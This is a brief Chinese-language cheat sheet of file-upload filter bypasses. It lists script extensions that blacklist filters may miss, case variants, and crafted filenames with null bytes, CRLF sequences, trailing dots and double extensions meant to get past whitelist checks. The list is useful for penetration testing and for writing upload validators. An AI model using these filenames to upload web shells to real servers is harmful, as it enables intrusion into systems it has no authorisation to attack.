常见的一些脚本文件上传绕过后缀,包括白名单和黑名单,来源于互联网,仅供参考。 在尝试过程中,可以通过 黑名单绕过:不同脚本语言支持的解析后缀 黑名单简单来说就是目标程序规定了哪些文件不能上传 PHP脚本后缀绕过 → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module ASP 脚本后缀绕过→ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml Jsp 脚本后缀绕过→ .jsp, .jspx, .jsw, .jsv, .jspf Coldfusion → .cfm, .cfml, .cfc, .dbm Perl → .pl, .cgi 随机大小写变换 → .pHp, .pHP5, .PhAr
白名单绕过:针对安全设备检测后缀的形式进行绕过 白名单简单来说就是目标程序规定了能上传的后缀名 file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php#.png file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png file.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg
|